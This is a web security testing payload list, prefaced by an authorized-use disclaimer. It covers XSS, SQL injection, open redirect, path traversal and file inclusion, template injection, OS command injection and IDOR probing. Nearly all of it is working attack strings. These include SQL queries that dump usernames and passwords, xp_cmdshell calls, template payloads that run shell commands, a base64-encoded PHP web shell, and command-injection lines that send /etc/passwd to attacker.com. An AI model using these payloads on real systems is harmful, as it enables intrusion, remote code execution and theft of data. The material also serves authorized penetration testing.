Comprehensive collection of security testing payloads, organized by vulnerability type (in order below: cross-site scripting, SQL injection, open redirect, path traversal / file inclusion, server-side template injection, OS command injection, and insecure direct object reference).
These payloads are for authorized security testing only. Use them only on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal. Use responsibly and ethically.
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<iframe src="javascript:alert('XSS')">
<ScRiPt>alert('XSS')</sCriPt>
<img src=x onerror="alert(String.fromCharCode(88,83,83))">
<svg/onload=alert('XSS')>
<img src=x onerror=alert`XSS`>
javascript:alert('XSS')
<body onload=alert('XSS')>
" onmouseover="alert('XSS')
' autofocus onfocus='alert('XSS')
" autofocus onfocus="alert(document.domain)
<svg><animatetransform onbegin=alert('XSS')>
<input onfocus=alert('XSS') autofocus>
<select onfocus=alert('XSS') autofocus>
<textarea onfocus=alert('XSS') autofocus>
<keygen onfocus=alert('XSS') autofocus>
#<script>alert('XSS')</script>
javascript:alert(document.cookie)
<img src=x onerror=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>
' OR '1'='1
' OR 1=1--
" OR "1"="1
' OR 1=1#
admin'--
admin' #
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT username,password FROM users--
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
' AND 1=1--
' AND 1=2--
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a
' AND (SELECT 'a' FROM users LIMIT 1)='a
' AND SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--
'; WAITFOR DELAY '00:00:05'--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND extractvalue(0x0a,concat(0x0a,(SELECT database())))--
' AND updatexml(null,concat(0x0a,(SELECT version())),null)--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' UNION SELECT @@version--
' UNION SELECT user()--
' UNION SELECT database()--
' UNION SELECT version()--
' UNION SELECT current_database()--
' UNION SELECT @@version--
'; EXEC xp_cmdshell('whoami')--
?url=https://evil.com
?redirect=https://evil.com
?return=https://evil.com
?next=https://evil.com
?url=//evil.com
?url=///evil.com
?url=////evil.com
?url=https:evil.com
?url=https;evil.com
?url=https://example.com@evil.com
?url=https://example.com.evil.com
?url=https://evil.com?example.com
?url=https://evil.com#example.com
?url=https://evil.com\@example.com
?url=https%3A%2F%2Fevil.com
?url=https%3a%2f%2fevil.com
?url=%68%74%74%70%73%3a%2f%2f%65%76%69%6c%2e%63%6f%6d
?url=javascript:alert(document.domain)
?url=javascript:window.location='https://evil.com'
?url=javascript:eval(atob('d2luZG93LmxvY2F0aW9uPSJodHRwczovL2V2aWwuY29tIg=='))
?file=../../../etc/passwd
?page=../../../../etc/passwd
?include=../../../../../../etc/passwd
?file=../../../etc/passwd%00
?file=../../../etc/passwd%00.jpg
?file=..%2F..%2F..%2Fetc%2Fpasswd
?file=..%252F..%252F..%252Fetc%252Fpasswd
?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
?file=../../../etc/passwd............[append more dots until the path-length limit is reached]
?file=php://filter/convert.base64-encode/resource=index.php
?file=php://input
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
?file=expect://whoami
?file=..\..\..\windows\system32\drivers\etc\hosts
?file=..\..\..\windows\win.ini
?file=C:\windows\system32\drivers\etc\hosts
?file=/var/log/apache2/access.log
?file=/var/log/nginx/access.log
?file=/var/log/mail.log
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
{{config.items()}}
{{''.__class__.__mro__[1].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
{{['cat /etc/passwd']|filter('system')}}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }
${"freemarker.template.utility.ObjectConstructor"?new()("java.lang.ProcessBuilder","id").start()}
{system('id')}
{php}echo `id`;{/php}
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("id"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end
<%= system("id") %>
<%= `id` %>
<%= IO.popen('id').readlines() %>
; whoami
| whoami
&& whoami
|| whoami
` whoami `
$(whoami)
; sleep 5
| sleep 5
&& ping -c 5 127.0.0.1
; nslookup burpcollaborator.net
| curl https://burpcollaborator.net
&& wget https://burpcollaborator.net
; curl https://attacker.com?data=$(cat /etc/passwd | base64)
| nslookup `whoami`.burpcollaborator.net
&& curl -X POST -d @/etc/passwd https://attacker.com
;w"h"o"a"m"i
;who$@ami
;w\ho\am\i
;${PATH:0:1}bin${PATH:0:1}whoami
& whoami
| whoami
|| whoami
&& whoami
%0a whoami
/api/user/1
/api/user/2
/api/user/100
/api/user/1000
# If your own account's ID is 5432, test the adjacent IDs:
/api/user/5431
/api/user/5433
/api/user/5430
/api/user/5435
# Test another user's UUID
/api/user/a7b9c8d6-1234-5678-9abc-def012345678
/api/user/f9e8d7c6-5432-1098-fedc-ba0987654321
# Base64-encoded IDs (decoded value shown in parentheses)
/api/user/MTIz (123)
/api/user/MTI0 (124)
/api/user/MTI1 (125)
POST /api/users
{"ids": [1, 2, 3, 4, 5, 100, 200]}
/api/user?id=123&id=456
/api/user?id[]=123&id[]=456
/api/user?user_id=123&userId=456
GET /api/user/123
POST /api/user/123
PUT /api/user/123
DELETE /api/user/123
PATCH /api/user/123
# Original request body:
{"user_id": 123, "action": "view_profile"}
# Then test the same request body with different IDs:
{"user_id": 124, "action": "view_profile"}
{"user_id": 1, "action": "view_profile"}
/api/user/../admin
/api/user/./1
/api/user/%2e%2e%2fadmin